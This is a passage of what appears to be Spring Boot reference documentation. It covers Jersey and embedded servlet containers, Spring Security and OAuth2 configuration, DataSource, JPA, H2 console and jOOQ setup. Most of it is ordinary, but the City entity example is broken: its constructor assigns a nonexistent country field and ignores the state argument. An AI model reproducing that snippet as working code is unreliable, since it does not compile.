Jersey\nservlet will be registered and mapped to `\/*` by default. You can change the mapping\nby adding `@ApplicationPath` to your `ResourceConfig`.\n\nBy default Jersey will be set up as a Servlet in a `@Bean` of type\n`ServletRegistrationBean` named `jerseyServletRegistration`. You can disable or override\nthat bean by creating one of your own with the same name. You can also use a Filter\ninstead of a Servlet by setting `spring.jersey.type=filter` (in which case the `@Bean` to\nreplace or override is `jerseyFilterRegistration`). The servlet has an `@Order` which you\ncan set with `spring.jersey.filter.order`. 
Both the Servlet and the Filter registrations\ncan be given init parameters using `spring.jersey.init.*` to specify a map of properties.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-jersey[Jersey sample] so\nyou can see how to set things up. There is also a\n{github-code}\/spring-boot-samples\/spring-boot-sample-jersey1[Jersey 1.x sample]. Note that\nin the Jersey 1.x sample that the spring-boot maven plugin has been configured to unpack\nsome Jersey jars so they can be scanned by the JAX-RS implementation (because the sample\nasks for them to be scanned in its `Filter` registration). You may need to do the same if\nany of your JAX-RS resources are packaged as nested jars.\n\n\n\n[[boot-features-embedded-container]]\n=== Embedded servlet container support\nSpring Boot includes support for embedded Tomcat, Jetty, and Undertow servers. Most\ndevelopers will simply use the appropriate '`Starter POM`' to obtain a fully configured\ninstance. By default the embedded server will listen for HTTP requests on port `8080`.\n\n\n\n[[boot-features-embedded-container-servlets-filters-listeners]]\n==== Servlets, Filters, and listeners\nWhen using an embedded servlet container you can register Servlets, Filters and all the\nlisteners from the Servlet spec (e.g. `HttpSessionListener`) either by using Spring beans\nor by scanning for Servlet components.\n\n\n[[boot-features-embedded-container-servlets-filters-listeners-beans]]\n===== Registering Servlets, Filters, and listeners as Spring beans\nAny `Servlet`, `Filter` or Servlet `*Listener` instance that is a Spring bean will be\nregistered with the embedded container. This can be particularly convenient if you want to\nrefer to a value from your `application.properties` during configuration.\n\nBy default, if the context contains only a single Servlet it will be mapped to `\/`. In the\ncase of multiple Servlet beans the bean name will be used as a path prefix. Filters will\nmap to `+\/*+`.\n\nIf convention-based mapping is not flexible enough you can use the\n`ServletRegistrationBean`, `FilterRegistrationBean` and `ServletListenerRegistrationBean`\nclasses for complete control. You can also register items directly if your bean implements\nthe `ServletContextInitializer` interface.\n\n\n\n[[boot-features-embedded-container-servlets-filters-listeners-scanning]]\n===== Scanning for Servlets, Filters, and listeners\nWhen using an embedded container, automatic registration of `@WebServlet`, `@WebFilter`,\nand `@WebListener` annotated classes can be enabled using `@ServletComponentScan`.\n\nTIP: `@ServletComponentScan` will have no effect in a standalone container, where the\ncontainer's built-in discovery mechanisms will be used instead.\n\n\n\n[[boot-features-embedded-container-application-context]]\n==== The EmbeddedWebApplicationContext\nUnder the hood Spring Boot uses a new type of `ApplicationContext` for embedded servlet\ncontainer support. The `EmbeddedWebApplicationContext` is a special type of\n`WebApplicationContext` that bootstraps itself by searching for a single\n`EmbeddedServletContainerFactory` bean. Usually a `TomcatEmbeddedServletContainerFactory`,\n`JettyEmbeddedServletContainerFactory`, or `UndertowEmbeddedServletContainerFactory` will\nhave been auto-configured.\n\nNOTE: You usually won't need to be aware of these implementation classes. 
Most\napplications will be auto-configured and the appropriate `ApplicationContext` and\n`EmbeddedServletContainerFactory` will be created on your behalf.\n\n\n\n[[boot-features-customizing-embedded-containers]]\n==== Customizing embedded servlet containers\nCommon servlet container settings can be configured using Spring `Environment`\nproperties. Usually you would define the properties in your `application.properties`\nfile.\n\nCommon server settings include:\n\n* `server.port` -- The listen port for incoming HTTP requests.\n* `server.address` -- The interface address to bind to.\n* `server.session.timeout` -- A session timeout.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`]\nclass for a complete list.\n\n\n\n[[boot-features-programmatic-embedded-container-customization]]\n===== Programmatic customization\nIf you need to configure your embdedded servlet container programmatically you can\nregister a Spring bean that implements the `EmbeddedServletContainerCustomizer` interface.\n`EmbeddedServletContainerCustomizer` provides access to the\n`ConfigurableEmbeddedServletContainer` which includes numerous customization setter\nmethods.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.context.embedded.*;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class CustomizationBean implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.setPort(9000);\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-customizing-configurableembeddedservletcontainerfactory-directly]]\n===== Customizing ConfigurableEmbeddedServletContainer directly\nIf the above customization techniques are too limited, you can register the\n`TomcatEmbeddedServletContainerFactory`, `JettyEmbeddedServletContainerFactory` or\n`UndertowEmbeddedServletContainerFactory` bean yourself.\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();\n\t\tfactory.setPort(9000);\n\t\tfactory.setSessionTimeout(10, TimeUnit.MINUTES);\n\t\tfactory.addErrorPages(new ErrorPage(HttpStatus.NOT_FOUND, \"\/notfound.html\"));\n\t\treturn factory;\n\t}\n----\n\nSetters are provided for many configuration options. Several protected method\n'`hooks`' are also provided should you need to do something more exotic. See the\nsource code documentation for details.\n\n\n\n[[boot-features-jsp-limitations]]\n==== JSP limitations\nWhen running a Spring Boot application that uses an embedded servlet container (and is\npackaged as an executable archive), there are some limitations in the JSP support.\n\n* With Tomcat it should work if you use war packaging, i.e. an executable war will work,\n and will also be deployable to a standard container (not limited to, but including\n Tomcat). An executable jar will not work because of a hard coded file pattern in Tomcat.\n\n* Jetty does not currently work as an embedded container with JSPs.\n\n* Undertow does not support JSPs.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-web-jsp[JSP sample] so you\ncan see how to set things up.\n\n\n\n[[boot-features-security]]\n== Security\nIf Spring Security is on the classpath then web applications will be secure by default\nwith '`basic`' authentication on all HTTP endpoints. 
To add method-level security to a web\napplication you can also add `@EnableGlobalMethodSecurity` with your desired settings.\nAdditional information can be found in the {spring-security-reference}#jc-method[Spring\nSecurity Reference].\n\nThe default `AuthenticationManager` has a single user ('`user`' username and random\npassword, printed at INFO level when the application starts up)\n\n[indent=0]\n----\n\tUsing default security password: 78fa095d-3f4c-48b1-ad50-e24c31d5cf35\n----\n\nNOTE: If you fine tune your logging configuration, ensure that the\n`org.springframework.boot.autoconfigure.security` category is set to log `INFO` messages,\notherwise the default password will not be printed.\n\nYou can change the password by providing a `security.user.password`. This and other useful\nproperties are externalized via\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\n(properties prefix \"security\").\n\nThe default security configuration is implemented in `SecurityAutoConfiguration` and in\nthe classes imported from there (`SpringBootWebSecurityConfiguration` for web security\nand `AuthenticationManagerConfiguration` for authentication configuration which is also\nrelevant in non-web applications). To switch off the Boot default configuration\ncompletely in a web application you can add a bean with `@EnableWebSecurity`. To customize\nit you normally use external properties and beans of type `WebSecurityConfigurerAdapter`\n(e.g. to add form-based login). There are several secure applications in the\n{github-code}\/spring-boot-samples\/[Spring Boot samples] to get you started with common\nuse cases.\n\nThe basic features you get out of the box in a web application are:\n\n* An `AuthenticationManager` bean with in-memory store and a single user (see\n `SecurityProperties.User` for the properties of the user).\n* Ignored (unsecure) paths for common static resource locations (`+\/css\/**+`, `+\/js\/**+`,\n `+\/images\/**+` and `+**\/favicon.ico+`).\n* HTTP Basic security for all other endpoints.\n* Security events published to Spring's `ApplicationEventPublisher` (successful and\n unsuccessful authentication and access denied).\n* Common low-level features (HSTS, XSS, CSRF, caching) provided by Spring Security are\n on by default.\n\nAll of the above can be switched on and off or modified using external properties\n(`+security.*+`). To override the access rules without changing any other autoconfigured\nfeatures add a `@Bean` of type `WebSecurityConfigurerAdapter` with\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)`.\n\n\n\n[[boot-features-security-oauth2]]\n=== OAuth2\nIf you have `spring-security-oauth2` on your classpath you can take advantage of some\nauto-configuration to make it easy to set up Authorization or Resource Server.\n\n\n\n[[boot-features-security-oauth2-authorization-server]]\n==== Authorization Server\nTo create an Authorization Server and grant access tokens you need to use\n`@EnableAuthorizationServer` and provide `security.oauth2.client.client-id` and\n`security.oauth2.client.client-secret]` properties. The client will be registered for you\nin an in-memory repository.\n\nHaving done that you will be able to use the client credentials to create an access token,\nfor example:\n\n[indent=0]\n----\n\t$ curl client:secret@localhost:8080\/oauth\/token -d grant_type=password -d username=user -d password=pwd\n----\n\nThe basic auth credentials for the `\/token` endpoint are the `client-id` and\n`client-secret`. 
The user credentials are the normal Spring Security user details (which\ndefault in Spring Boot to \"`user`\" and a random password).\n\nTo switch off the auto-configuration and configure the Authorization Server features\nyourself just add a `@Bean` of type `AuthorizationServerConfigurer`.\n\n\n\n[[boot-features-security-oauth2-resource-server]]\n==== Resource Server\nTo use the access token you need a Resource Server (which can be the same as the\nAuthorization Server). Creating a Resource Server is easy, just add\n`@EnableResourceServer` and provide some configuration to allow the server to decode\naccess tokens. If your appplication is also an Authorization Server it already knows how\nto decode tokens, so there is nothing else to do. If your app is a standalone service then you\nneed to give it some more configuration, one of the following options:\n\n* `security.oauth2.resource.user-info-uri` to use the `\/me` resource (e.g.\n`https:\/\/uaa.run.pivotal.io\/userinfo` on PWS)\n\n* `security.oauth2.resource.token-info-uri` to use the token decoding endpoint (e.g.\n`https:\/\/uaa.run.pivotal.io\/check_token` on PWS).\n\nIf you specify both the `user-info-uri` and the `token-info-uri` then you can set a flag\nto say that one is preferred over the other (`prefer-token-info=true` is the default).\n\nAlternatively (instead of `user-info-uri` or `token-info-uri`) if the tokens are JWTs you\ncan configure a `security.oauth2.resource.jwt.key-value` to decode them locally (where the\nkey is a verification key). The verification key value is either a symmetric secret or\nPEM-encoded RSA public key. If you don't have the key and it's public you can provide a\nURI where it can be downloaded (as a JSON object with a \"`value`\" field) with\n`security.oauth2.resource.jwt.key-uri`. E.g. on PWS:\n\n[indent=0]\n----\n\t$ curl https:\/\/uaa.run.pivotal.io\/token_key\n\t{\"alg\":\"SHA256withRSA\",\"value\":\"-----BEGIN PUBLIC KEY-----\\nMIIBI...\\n-----END PUBLIC KEY-----\\n\"}\n----\n\nWARNING: If you use the `security.oauth2.resource.jwt.key-uri` the authorization server\nneeds to be running when your application starts up. It will log a warning if it can't\nfind the key, and tell you what to do to fix it.\n\n\n\n[[boot-features-security-oauth2-token-type]]\n=== Token Type in User Info\nGoogle, and certain other 3rd party identity providers, are more strict about the token\ntype name that is sent in the headers to the user info endpoint. The default is \"`Bearer`\"\nwhich suits most providers and matches the spec, but if you need to change it you can set\n`security.oauth2.resource.token-type`.\n\n\n\n[[boot-features-security-custom-user-info]]\n=== Customizing the User Info RestTemplate\nIf you have a `user-info-uri`, the resource server features use an `OAuth2RestTemplate`\ninternally to fetch user details for authentication. This is provided as a qualified\n`@Bean` with id `userInfoRestTemplate`, but you shouldn't need to know that to just\nuse it. The default should be fine for most providers, but occasionally you might need to\nadd additional interceptors, or change the request authenticator (which is how the token\ngets attached to outgoing requests). To add a customization just create a bean of type\n`UserInfoRestTemplateCustomizer` - it has a single method that will be called after the\nbean is created but before it is initialized. 
The rest template that is being customized\nhere is _only_ used internally to carry out authentication.\n\n[TIP]\n====\nTo set an RSA key value in YAML use the \"`pipe`\" continuation marker to split it over\nmultiple lines (\"`|`\") and remember to indent the key value (it's a standard YAML\nlanguage feature). Example:\n\n[source,yaml,indent=0]\n----\n\tsecurity:\n\t\toauth2:\n\t\t\tresource:\n\t\t\t\tjwt:\n\t\t\t\t\tkeyValue: |\n\t\t\t\t\t\t-----BEGIN PUBLIC KEY-----\n\t\t\t\t\t\tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC...\n\t\t\t\t\t\t-----END PUBLIC KEY-----\n----\n====\n\n\n\n[[boot-features-security-custom-user-info-client]]\n==== Client\nTo make your webapp into an OAuth2 client you can simply add `@EnableOAuth2Client` and\nSpring Boot will create an `OAuth2RestTemplate` for you to `@Autowire`. It uses the\n`security.oauth2.client.*` as credentials (the same as you might be using in the\nAuthorization Server), but in addition it will need to know the authorization and token\nURIs in the Authorization Server. For example:\n\n.application.yml\n[source,yaml,indent=0]\n----\n\tsecurity:\n\t\toauth2:\n\t\t\tclient:\n\t\t\t\tclientId: bd1c0a783ccdd1c9b9e4\n\t\t\t\tclientSecret: 1a9030fbca47a5b2c28e92f19050bb77824b5ad1\n\t\t\t\taccessTokenUri: https:\/\/github.com\/login\/oauth\/access_token\n\t\t\t\tuserAuthorizationUri: https:\/\/github.com\/login\/oauth\/authorize\n\t\t\t\tclientAuthenticationScheme: form\n----\n\nAn application with this configuration will redirect to Github for authorization when you\nattempt to use the `OAuth2RestTemplate`. If you are already signed into Github you won't\neven notice that it has authenticated. These specific credentials will only work if your\napplication is running on port 8080 (register your own client app in Github or other\nprovider for more flexibility).\n\nTo limit the scope that the client asks for when it obtains an access token you can set\n`security.oauth2.client.scope` (comma separated or an array in YAML). By default the scope\nis empty and it is up to Authorization Server to decide what the defaults should be,\nusually depending on the settings in the client registration that it holds.\n\nNOTE: There is also a setting for `security.oauth2.client.client-authentication-scheme`\nwhich defaults to \"`header`\" (but you might need to set it to \"`form`\" if, like Github for\ninstance, your OAuth2 provider doesn't like header authentication). In fact, the\n`security.oauth2.client.*` properties are bound to an instance of\n`AuthorizationCodeResourceDetails` so all its properties can be specified.\n\nTIP: In a non-web application you can still `@Autowire` an `OAuth2RestOperations` and it\nis still wired into the `security.oauth2.client.*` configuration. In this case it is a\n\"`client credentials token grant`\" you will be asking for if you use it (and there is no\nneed to use `@EnableOAuth2Client` or `@EnableOAuth2Sso`). To switch it off, just remove\nthe `security.oauth2.client.client-id` from your configuration (or make it the empty\nstring).\n\n\n\n[[boot-features-security-oauth2-single-sign-on]]\n==== Single Sign On\nAn OAuth2 Client can be used to fetch user details from the provider (if such features are\navailable) and then convert them into an `Authentication` token for Spring Security.\nThe Resource Server above support this via the `user-info-uri` property This is the basis\nfor a Single Sign On (SSO) protocol based on OAuth2, and Spring Boot makes it easy to\nparticipate by providing an annotation `@EnableOAuth2Sso`. 
The Github client above can\nprotect all its resources and authenticate using the Github `\/user\/` endpoint, by adding\nthat annotation and declaring where to find the endpoint (in addition to the\n`security.oauth2.client.*` configuration already listed above):\n\n.application.yml\n[source,yaml,indent=0]]\n----\n\tsecurity:\n\t\toauth2:\n\t...\n\t\tresource:\n\t\t\tuserInfoUri: https:\/\/api.github.com\/user\n\t\t\tpreferTokenInfo: false\n----\n\nSince all paths are secure by default, there is no \"`home`\" page that you can show to\nunauthenticated users and invite them to login (by visiting the `\/login` path, or the\npath specified by `security.oauth2.sso.login-path`).\n\nTo customize the access rules or paths to protect, so you can add a \"`home`\" page for\ninstance, `@EnableOAuth2Sso` can be added to a `WebSecurityConfigurerAdapter` and the\nannotation will cause it to be decorated and enhanced with the necessary pieces to get\nthe `\/login` path working. For example, here we simply allow unauthenticated access\nto the home page at \"\/\" and keep the default for everything else:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\tpublic class WebSecurityConfiguration extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tpublic void init(WebSecurity web) {\n\t\t\tweb.ignore(\"\/\");\n\t\t}\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\thttp.antMatcher(\"\/**\").authorizeRequests().anyRequest().authenticated();\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-security-actuator]]\n=== Actuator Security\nIf the Actuator is also in use, you will find:\n\n* The management endpoints are secure even if the application endpoints are unsecure.\n* Security events are transformed into `AuditEvents` and published to the `AuditService`.\n* The default user will have the `ADMIN` role as well as the `USER` role.\n\nThe Actuator security features can be modified using external properties\n(`+management.security.*+`). To override the application access rules\nadd a `@Bean` of type `WebSecurityConfigurerAdapter` and use\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)` if you _don't_ want to override\nthe actuator access rules, or `@Order(ManagementServerProperties.ACCESS_OVERRIDE_ORDER)`\nif you _do_ want to override the actuator access rules.\n\n\n\n[[boot-features-sql]]\n== Working with SQL databases\nThe Spring Framework provides extensive support for working with SQL databases. From\ndirect JDBC access using `JdbcTemplate` to complete '`object relational mapping`'\ntechnologies such as Hibernate. Spring Data provides an additional level of functionality,\ncreating `Repository` implementations directly from interfaces and using conventions to\ngenerate queries from your method names.\n\n\n\n[[boot-features-configure-datasource]]\n=== Configure a DataSource\nJava's `javax.sql.DataSource` interface provides a standard method of working with\ndatabase connections. 
Traditionally a DataSource uses a `URL` along with some\ncredentials to establish a database connection.\n\n\n\n[[boot-features-embedded-database-support]]\n==== Embedded Database Support\nIt's often convenient to develop applications using an in-memory embedded database.\nObviously, in-memory databases do not provide persistent storage; you will need to\npopulate your database when your application starts and be prepared to throw away\ndata when your application ends.\n\nTIP: The '`How-to`' section includes a _<<howto.adoc#howto-database-initialization,\nsection on how to initialize a database>>_\n\nSpring Boot can auto-configure embedded http:\/\/www.h2database.com[H2],\nhttp:\/\/hsqldb.org\/[HSQL] and http:\/\/db.apache.org\/derby\/[Derby] databases. You don't need\nto provide any connection URLs, simply include a build dependency to the embedded database\nthat you want to use.\n\nFor example, typical POM dependencies would be:\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-jpa<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.hsqldb<\/groupId>\n\t\t<artifactId>hsqldb<\/artifactId>\n\t\t<scope>runtime<\/scope>\n\t<\/dependency>\n----\n\nTIP: If you're using H2 and, for whatever reason, you do configure its connection URL,\ncare should be taken to disable the database's automatic shutdown using\n`DB_CLOSE_ON_EXIT=FALSE`. This allows Spring Boot to control when the database is closed,\nthereby ensuring that it happens once access to the database is no longer needed.\n\nNOTE: You need a dependency on `spring-jdbc` for an embedded database to be\nauto-configured. In this example it's pulled in transitively via\n`spring-boot-starter-data-jpa`.\n\n\n\n[[boot-features-connect-to-production-database]]\n==== Connection to a production database\nProduction database connections can also be auto-configured using a pooling `DataSource`.\nHere's the algorithm for choosing a specific implementation:\n\n* We prefer the Tomcat pooling `DataSource` for its performance and concurrency, so if\n that is available we always choose it.\n* If HikariCP is available we will use it.\n* If Commons DBCP is available we will use it, but we don't recommend it in production.\n* Lastly, if Commons DBCP2 is available we will use it.\n\nIf you use the `spring-boot-starter-jdbc` or `spring-boot-starter-data-jpa`\n'`starter POMs`' you will automatically get a dependency to `tomcat-jdbc`.\n\nNOTE: You can bypass that algorithm completely and specify the connection pool to use via\nthe `spring.datasource.type` property. Also, additional connection pools can always be\nconfigured manually. If you define your own `DataSource` bean, auto-configuration will\nnot occur.\n\nDataSource configuration is controlled by external configuration properties in\n`+spring.datasource.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tspring.datasource.username=dbuser\n\tspring.datasource.password=dbpass\n\tspring.datasource.driver-class-name=com.mysql.jdbc.Driver\n----\n\nSee {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[`DataSourceProperties`]\nfor more of the supported options. 
Note also that you can configure any of the\n`DataSource` implementation specific properties via `+spring.datasource.*+`: refer to the\ndocumentation of the connection pool implementation you are using for more details.\n\nTIP: You often won't need to specify the `driver-class-name` since Spring boot can deduce\nit for most databases from the `url`.\n\nNOTE: For a pooling `DataSource` to be created we need to be able to verify that a valid\n`Driver` class is available, so we check for that before doing anything. I.e. if you set\n`spring.datasource.driverClassName=com.mysql.jdbc.Driver` then that class has to be\nloadable.\n\n\n\n[[boot-features-connecting-to-a-jndi-datasource]]\n==== Connection to a JNDI DataSource\nIf you are deploying your Spring Boot application to an Application Server you might want\nto configure and manage your DataSource using your Application Servers built-in features\nand access it using JNDI.\n\nThe `spring.datasource.jndi-name` property can be used as an alternative to the\n`spring.datasource.url`, `spring.datasource.username` and `spring.datasource.password`\nproperties to access the `DataSource` from a specific JNDI location. For example, the\nfollowing section in `application.properties` shows how you can access a JBoss AS defined\n`DataSource`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.jndi-name=java:jboss\/datasources\/customers\n----\n\n\n\n[[boot-features-using-jdbc-template]]\n=== Using JdbcTemplate\nSpring's `JdbcTemplate` and `NamedParameterJdbcTemplate` classes are auto-configured and\nyou can `@Autowire` them directly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jdbc.core.JdbcTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JdbcTemplate jdbcTemplate) {\n\t\t\tthis.jdbcTemplate = jdbcTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-jpa-and-spring-data]]\n=== JPA and '`Spring Data`'\nThe Java Persistence API is a standard technology that allows you to '`map`' objects to\nrelational databases. The `spring-boot-starter-data-jpa` POM provides a quick way to get\nstarted. It provides the following key dependencies:\n\n* Hibernate -- One of the most popular JPA implementations.\n* Spring Data JPA -- Makes it easy to implement JPA-based repositories.\n* Spring ORMs -- Core ORM support from the Spring Framework.\n\nTIP: We won't go into too many details of JPA or Spring Data here. You can follow the\nhttp:\/\/spring.io\/guides\/gs\/accessing-data-jpa\/['`Accessing Data with JPA`'] guide from\nhttp:\/\/spring.io and read the http:\/\/projects.spring.io\/spring-data-jpa\/[Spring Data JPA]\nand http:\/\/hibernate.org\/orm\/documentation\/[Hibernate] reference documentation.\n\n\n\n[[boot-features-entity-classes]]\n==== Entity Classes\nTraditionally, JPA '`Entity`' classes are specified in a `persistence.xml` file. With\nSpring Boot this file is not necessary and instead '`Entity Scanning`' is used. By default\nall packages below your main configuration class (the one annotated with\n`@EnableAutoConfiguration` or `@SpringBootApplication`) will be searched.\n\nAny classes annotated with `@Entity`, `@Embeddable` or `@MappedSuperclass` will be\nconsidered. 
A typical entity class would look something like this:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport java.io.Serializable;\n\timport javax.persistence.*;\n\n\t@Entity\n\tpublic class City implements Serializable {\n\n\t\t@Id\n\t\t@GeneratedValue\n\t\tprivate Long id;\n\n\t\t@Column(nullable = false)\n\t\tprivate String name;\n\n\t\t@Column(nullable = false)\n\t\tprivate String state;\n\n\t\t\/\/ ... additional members, often include @OneToMany mappings\n\n\t\tprotected City() {\n\t\t\t\/\/ no-args constructor required by JPA spec\n\t\t\t\/\/ this one is protected since it shouldn't be used directly\n\t\t}\n\n\t\tpublic City(String name, String state) {\n\t\t\tthis.name = name;\n\t\t\tthis.country = country;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn this.name;\n\t\t}\n\n\t\tpublic String getState() {\n\t\t\treturn this.state;\n\t\t}\n\n\t\t\/\/ ... etc\n\n\t}\n----\n\nTIP: You can customize entity scanning locations using the `@EntityScan` annotation. See\nthe _<<howto.adoc#howto-separate-entity-definitions-from-spring-configuration>>_ how-to.\n\n\n\n[[boot-features-spring-data-jpa-repositories]]\n==== Spring Data JPA Repositories\nSpring Data JPA repositories are interfaces that you can define to access data. JPA\nqueries are created automatically from your method names. For example, a `CityRepository`\ninterface might declare a `findAllByState(String state)` method to find all cities in a\ngiven state.\n\nFor more complex queries you can annotate your method using Spring Data's\n{spring-data-javadoc}\/repository\/Query.html[`Query`] annotation.\n\nSpring Data repositories usually extend from the\n{spring-data-commons-javadoc}\/repository\/Repository.html[`Repository`] or\n{spring-data-commons-javadoc}\/repository\/CrudRepository.html[`CrudRepository`] interfaces.\nIf you are using auto-configuration, repositories will be searched from the package\ncontaining your main configuration class (the one annotated with\n`@EnableAutoConfiguration` or `@SpringBootApplication`) down.\n\nHere is a typical Spring Data repository:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: We have barely scratched the surface of Spring Data JPA. For complete details check\ntheir http:\/\/projects.spring.io\/spring-data-jpa\/[reference documentation].\n\n\n\n[[boot-features-creating-and-dropping-jpa-databases]]\n==== Creating and dropping JPA databases\nBy default, JPA databases will be automatically created *only* if you use an embedded\ndatabase (H2, HSQL or Derby). You can explicitly configure JPA settings using\n`+spring.jpa.*+` properties. For example, to create and drop tables you can add the\nfollowing to your `application.properties`.\n\n[indent=0]\n----\n\tspring.jpa.hibernate.ddl-auto=create-drop\n----\n\nNOTE: Hibernate's own internal property name for this (if you happen to remember it\nbetter) is `hibernate.hbm2ddl.auto`. You can set it, along with other Hibernate native\nproperties, using `+spring.jpa.properties.*+` (the prefix is stripped before adding them\nto the entity manager). 
Example:\n\n[indent=0]\n----\n\tspring.jpa.properties.hibernate.globally_quoted_identifiers=true\n----\n\npasses `hibernate.globally_quoted_identifiers` to the Hibernate entity manager.\n\nBy default the DDL execution (or validation) is deferred until the `ApplicationContext`\nhas started. There is also a `spring.jpa.generate-ddl` flag, but it is not used if\nHibernate autoconfig is active because the `ddl-auto` settings are more fine-grained.\n\n\n\n[[boot-features-sql-h2-console]]\n=== Using H2's web console\nThe http:\/\/www.h2database.com[H2 database] provides a\nhttp:\/\/www.h2database.com\/html\/quickstart.html#h2_console[browser-based console] that\nSpring Boot can auto-configure for you. The console will be auto-configured when the\nfollowing conditions are met:\n\n* You are developing a web application\n* `com.h2database:h2` is on the classpath\n* You are using <<using-spring-boot.adoc#using-boot-devtools,Spring Boot's developer\n tools>>\n\nTIP: If you are not using Spring Boot's developer tools, but would still like to make use\nof H2's console, then you can do so by configuring the `spring.h2.console.enabled`\nproperty with a value of `true`. The H2 console is only intended for use during\ndevelopment so care should be taken to ensure that `spring.h2.console.enabled` is not set\nto `true` in production.\n\n\n\n[[boot-features-sql-h2-console-custom-path]]\n==== Changing the H2 console's path\nBy default the console will be available at `\/h2-console`. You can customize the console's\npath using the `spring.h2.console.path` property.\n\n\n\n[[boot-features-sql-h2-console-securing]]\n==== Securing the H2 console\nWhen Spring Security is on the classpath and basic auth is enabled, the H2 console will be\nautomatically secured using basic auth. The following properties can be used to customize\nthe security configuration:\n\n* `security.user.role`\n* `security.basic.authorize-mode`\n* `security.basic.enabled`\n\n\n\n[[boot-features-jooq]]\n== Using jOOQ\nJava Object Oriented Querying (http:\/\/www.jooq.org\/[jOOQ]) is a popular product from\nhttp:\/\/www.datageekery.com\/[Data Geekery] which generates Java code from your\ndatabase, and lets you build type safe SQL queries through its fluent API. Both the\ncommercial and open source editions can be used with Spring Boot.\n\n\n\n=== Code Generation\nIn oder to use jOOQ type-safe queries, you need to generate Java classes from your\ndatabase schema. You can follow the instructions in the\nhttp:\/\/www.jooq.org\/doc\/3.6\/manual-single-page\/#jooq-in-7-steps-step3[jOOQ user manual].\nIf you are using the `jooq-codegen-maven` plugin (and you also use the\n`spring-boot-starter-parent` \"`parent POM`\") you can safely omit the plugin's `<version>`\ntag. You can also use Spring Boot defined version variables (e.g. `h2.version`) to\ndeclare the plugin's database dependency. 
Here's an example:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.jooq<\/groupId>\n\t\t<artifactId>jooq-codegen-maven<\/artifactId>\n\t\t<executions>\n\t\t\t...\n\t\t<\/executions>\n\t\t<dependencies>\n\t\t\t<dependency>\n\t\t\t\t<groupId>com.h2database<\/groupId>\n\t\t\t\t<artifactId>h2<\/artifactId>\n\t\t\t\t<version>${h2.version}<\/version>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t\t<configuration>\n\t\t\t<jdbc>\n\t\t\t\t<driver>org.h2.Driver<\/driver>\n\t\t\t\t<url>jdbc:h2:~\/yourdatabase<\/url>\n\t\t\t<\/jdbc>\n\t\t\t<generator>\n\t\t\t\t...\n\t\t\t<\/generator>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\n\n\n=== Using DSLContext\nThe fluent API offered by jOOQ is initiated via the `org.jooq.DSLContext` interface.\nSpring Boot will auto-configure a `DSLContext` as a Spring Bean and connect it to your\napplication `DataSource`. To use the `DSLContext` you can just `@Autowire` it:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class JooqExample implements CommandLineRunner {\n\n\t\tprivate final DSLContext create;\n\n\t\t@Autowired\n\t\tpublic JooqExample(DSLContext dslContext) {\n\t\t\tthis.create = dslContext;\n\t\t}\n\n\t}\n----\n\nTIP: The jOOQ manual tends to use a variable named `create` to hold the `DSLContext`,\nwe've done the same for this example.\n\nYou can then use the `DSLContext` to construct your queries:\n\n[source,java,indent=0]\n----\n\tpublic List<GregorianCalendar> authorsBornAfter1980() {\n\t\treturn this.create.selectFrom(AUTHOR)\n\t\t\t.where(AUTHOR.DATE_OF_BIRTH.greaterThan(new GregorianCalendar(1980, 0, 1)))\n\t\t\t.fetch(AUTHOR.DATE_OF_BIRTH);\n\t}\n----\n\n\n\n=== Customizing jOOQ\nYou can customize the SQL dialect used by jOOQ by setting `spring.jooq.sql-dialect` in\nyour `application.properties`. For example, to specify Postgres you would add:\n\n[source,properties,indent=0]\n----\n\tspring.jooq.sql-dialect=Postgres\n----\n\nMore advanced customizations can be achieved by defining your own `@Bean` definitions\nwhich will be used when the jOOQ `Configuration` is created. You can define beans for\nthe following jOOQ Types:\n\n* `ConnectionProvider`\n* 